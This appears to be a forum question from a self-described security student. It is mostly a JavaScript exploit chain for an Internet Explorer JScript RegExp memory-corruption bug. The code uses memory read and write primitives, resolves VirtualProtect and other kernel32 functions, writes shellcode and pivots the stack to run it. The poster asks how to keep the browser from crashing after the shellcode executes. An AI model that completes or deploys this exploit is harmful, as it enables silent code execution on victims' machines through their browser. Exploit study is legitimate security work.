I am a student studying information security. Recently I read this article (link) and wrote a full exploit for it. calc.exe is executed as expected, but after the shellcode runs, IE just crashes (because no further code is provided after the shellcode...). I tried to avoid the crash but could not find a proper solution. What I tried is as follows.
... var jscriptPointer = readDWORD(fakeRegExpAddr);
var jscriptBase = resolveModuleBase(jscriptPointer);
var kernel32Pointer = resolveModuleByIAT(jscriptBase, "KERNEL32.dll");
var kernel32Base = resolveModuleBase(kernel32Pointer);
var VirtualProtect = resolveKernel32Function(kernel32Base, "VirtualProtect");
var GetModuleHandleA = resolveKernel32Function(kernel32Base, "GetModuleHandleA");
var GetProcAddress = resolveKernel32Function(kernel32Base, "GetProcAddress");
var stack = a(fakeRegExpAddr, readDWORD(fakeRegExpAddr));
var regExpExecAddress = ((stack.charCodeAt(4)<<16)|stack.charCodeAt(3)) - 0x44;
var oldEbp = ((stack.charCodeAt(7)&0xFF)<<24) | (stack.charCodeAt(6)<<8) | ((stack.charCodeAt(5)>>8)&0xFF);
var newEbp = regExpExecAddress - 0x2000;
var pLongjmpTarget = regExpExecAddress;
var sc = fakeRegExpAddr + sizeof_RegExpObj;
for(var f=0; f<shellcode.length; f++){
a(sc + (f * sizeof_WORD), shellcode.charCodeAt(f));
}
var ctx = sc + 5;
a(ctx + (2 * e), oldEbp); // these two lines are for passing data
a(ctx + (3 * e), pLongjmpTarget); // to shellcode.
for(var f=newEbp-0x20; f<newEbp+0x40; f+=U)
{
a(f,0x7FFE0000);
}
a(newEbp + 4, VirtualProtect);
a(newEbp + 4 + 4 + 0x18, sc);
a(newEbp + 4 + 4 + 4 + 0x18, sc);
a(newEbp + 4 + 4 + 4 + 4 + 0x18, (shellcode.length * sizeof_WCHAR));
a(newEbp + 4 + 4 + 4 + 4 + 4 + 0x18, 0x40);
a(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x18, newEbp);
a(regExpExecAddress, newEbp);
}
This code is based on this link. I don't know what to do in the shellcode after that point. How can I handle this problem? Any suggestions are welcome. Thanks in advance.